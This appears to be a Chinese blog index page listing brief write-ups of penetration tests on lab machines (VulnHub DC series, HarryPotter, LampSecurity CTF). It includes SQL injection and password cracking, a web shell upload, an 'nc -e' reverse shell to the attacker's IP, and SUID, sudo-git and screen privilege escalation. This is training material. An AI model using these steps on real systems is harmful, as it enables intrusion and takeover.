自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(15)
  • 收藏
  • 关注

原创 LampSecurity-CTF5 靶场记录

3、进入到amy用户后,通过查看/var/mail目录下查看邮件信息,查询到patrick应该是管理员,使用ls -liah查看patrick中是否有可利用文件,进入.tomboy目录下发现有几个note文件,其中一个文件中具有root的密码,直接使用su切换到root命令提示需要提高交互性,2、拿到账号密码后成功登录到后台界面,寻找可以进行代码执行的界面,最终在上传blog的界面放入一句话木马,访问后使用蚁剑连接(这里使用nc -e没法行通,是因为不支持-e参数,可直接使用bash命令反弹shell)。

2023-08-19 21:44:20 74

原创 LampSecurity-CTF4 靶场记录

1、首先进行常规nmap扫描,发现四个端口,22,25,80,631。2、打开web界面,发现不像是英语,而是其他语言,没有可利用信息,再查看–script-vuln扫出来的信息发现可能存在sql注入漏洞,测试后发现存在sql注入漏洞。3、使用sqlmap对数据库进行注入,查看到user表中的数据,里面有六组账号密码,尝试使用ssh登录。4、在ssh登录过程中发现报错,查看报错信息是服务器和客户端的算法不一致导致无法登录,在ssh后面将报错内提供的算法写进参数即可正常使用ssh。

2023-08-15 16:35:02 153 1

原创 HarryPotter-Fawkes 三部曲之第三部 靶场记录

1、首先进行信息收集,对靶机进行nmap扫描,扫描到开放了21,22,80,2222,9898端口,相比起前两个靶机,难度明显增加。2、打开80端口还是跟前两个靶机一样,只有图片;在扫描到的信息中我们发现21端口ftp服务可以使用匿名服务登录,登录后在里面拿到了一个server_hogwarts文件,下载后发现是一个可执行文件,赋予权限执行后并没有反应。

2023-08-14 11:15:31 205 6

原创 HarryPotter-Nagini 三部曲之第二部 靶场记录

1、进行常规扫描,开放22,80端口2、访问页面只有一张图片,通过gobuster进行目录爆破后发现有joomla的页面和一个note.txt,使用joomscan扫描发现了一个.bak文件,里面有数据库名、用户名以及空密码3、note.txt文件中提示我们使用http3查看文件,该文件指向一个路径,打开后是一个存在ssrf的页面。

2023-08-07 20:36:57 136 2

原创 HarryPotter-Aragog 三部曲之第一部 靶场记录

5、WordPress搭建的网站默认数据库账号密码会记录在/etc/wordpress目录里的config-default.php 文件中,在里面找到了数据库的账号密码,进行连入;6、在hagrid98账号下我们拿到了第一个horcrux,在目录中搜寻的过程中,找到一个.backup.sh文件,查看发现脚本文件内容是将上传的文件复制到tmp目录里,应该是定时执行。2、使用dirb来扫描网站,扫出了/blog和/blog/wp-login,发现页面显示不正常,需要在/etc/hosts添加域名解析。

2023-08-04 17:06:37 86 1

原创 DC-9 靶场记录

1、常规扫描靶机ip,发现只开放了一个80端口2、在web界面中发现sql注入漏洞,通过sqlmap注入后得到了很多账号密码,其中包括admin和MD5加密的密码3、使用下载好的Hash-Buster来破解MD5,得到账号密码后登录网页4、在网页中发现页脚下存在File does not exist,可能存在文件包含漏洞5、经测试确定是文件包含漏洞,查看/etc/passwd中发现了我们之前爆破出来的账号密码,想要尝试使用ssh登录,但是没有开端口;

2023-08-03 12:01:44 58

原创 DC-8 靶场记录

1、对靶机进行常规扫描,扫描到端口22,802、进入80端口后发现有sql注入,通过sql注入爆破出admin、john以及两组密文3、将爆破出的密文再次爆破,得到john的密码turtle4、通过john turtle登录到页面后,找到能写反弹shell的地方5、在页面写入反弹shell后kali监听6、kali中使用find / -perm -u=s -type f 2>/dev/null查看有哪些命令有root权限。

2023-08-01 16:47:36 42 2

原创 DC- 7 靶场记录

一、信息收集查看靶机的ip打开80端口发现有搜索框和登录框根据提示,暴力破解或许不会成功。搜寻了好久都没有头绪,在GitHub搜索DC7USER尝试找到一些提示,成功找到账号密码尝试用它登录ssh成功连入查看是否有可利用信息查阅资料了解drush可以用命令行操作的形式管理Drupal站点通过drush来修改admin的密码显示未修改成功,要在登录页面的路径下修改密码修改成功,尝试登录由于前面尝试爆破后限制了登录,重装了靶机,靶机ip变为192.168.1.104。

2023-07-31 10:10:13 44 1

原创 DC-5 靶场记录

6、searchsploit screen-4.5.0后下载相关文档,根据文档的指示写了三个文件libhax.so、rootshell、dc5.sh,通过蚁剑直接上传到靶机中,赋予dc5.sh 777权限并执行,即可成功。5、kali中使用sudo -l发现无法查看,则通过find / -perm -u=s -type f 2>/dev/null来查看是否可以使用suid提权,发现可以利用screen-4.5.0进行提权。3、由于页面是nginx,nginx的默认日志路径为/var/log/nginx中,

2023-07-29 21:23:28 59

原创 DC-4 靶场记录

1、首先扫描靶机发现开放22,80系统,打开web页面后发现是一个登录框,用burpsuite进行爆破,成功拿到admin的账号密码。2、登录后发现是一个可以执行命令的按钮,通过burpsuite抓包输入我们想要的命令。3、在kali端进行端口接听,准备反弹shell。通过burpsuite抓包将参数改成nc -e 192.168.179.141 6666进行反弹shell,成功。

2023-07-27 16:06:12 54 1

原创 DC-3 靶场记录

得到靶机ip 192.168.179.145进行nmap扫描打开80端口通过Wappalyzer火狐插件得知CMS为Joomla,利用Joomla的扫描器进行扫描.成功拿到一个登录界面。

2023-07-26 15:30:41 131 1

原创 DC-2 靶场记录

将/bin/bash赋值给一个新的变量,将/bin和/usr/bin作为PATH环境变量导出。4、通过sudo -l发现(root)NOPASSWD:/usr/bin/git ,利用git提权。2、需要通过wpscan爆破出用户名,再用cewl生成密码字典,再用wpscan爆破密码。发现无法直接使用su切换到jerry,被rbash所限制,尝试绕过rbash。由flag4中得到提示,我们需要使用到git来进行提权。成功进入到jerry后,拿到flag4。/bin/bash 或!/bin/bash 或!

2023-07-25 14:41:14 48

原创 DC-1 靶场记录

发现admin的密码,密码经过加盐不易破解,所以尝试选择修改admin密码的方法来连接。通过flag1得到信息,让我们寻找一个config file配置文件。通过进入目录查找,最终在sites目录中找到settings.php。修改成功后就可以去80端口页面使用admin abc进行登录。使用msf查看一下drupal是否有可利用漏洞。使用python提升shell交互性。使用nmap或arp获取靶机的ip。尝试使用hydra进行爆破。得到数据库的用户名和密码。使用find命令进行提权。

2023-07-22 16:45:00 69 1

原创 DC-6 靶场记录

sudo nmap --script=getroot.sh //nmap–script 参数可以执行脚本。使用 echo “/bin/bash” >> backups.sh 将/bin/bash写入backups.sh中。在mark的stuff目录下找到一个things-to-do.txt。使用wordy --url http://wordy/ -e u。sudo -u jens ./backups.sh 执行该文件。用sudo arp-scan -l。

2023-06-04 21:45:49 69 4

原创 westwild 靶场记录

关于 westwild靶场记录

2023-05-25 20:45:19 120 7

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除